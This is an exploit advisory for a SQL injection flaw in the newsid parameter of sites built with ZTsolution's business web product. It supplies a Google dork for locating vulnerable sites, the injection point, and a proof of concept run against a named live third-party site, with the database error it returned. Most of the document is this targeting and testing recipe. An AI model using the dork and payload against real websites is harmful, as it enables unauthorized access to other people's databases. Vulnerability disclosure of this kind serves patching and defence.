#################################################################################################
# Exploit Title : Powered by ZTsolution Business England SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 26/06/2018
# Vendor Homepage : zt-solutions.business.site ~ ztsolutions.co.uk
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered by ZTsolution''
# Exploit : /news.php?newsid=[SQL Inj]
#################################################################################################
# Example Site => surabayapolandconsulate.com/news.php?newsid=13%27 => [ Proof of Concept ] =>
# SQL Database Error =>
select * from tnews where newsID ='13''
You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near ''13''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################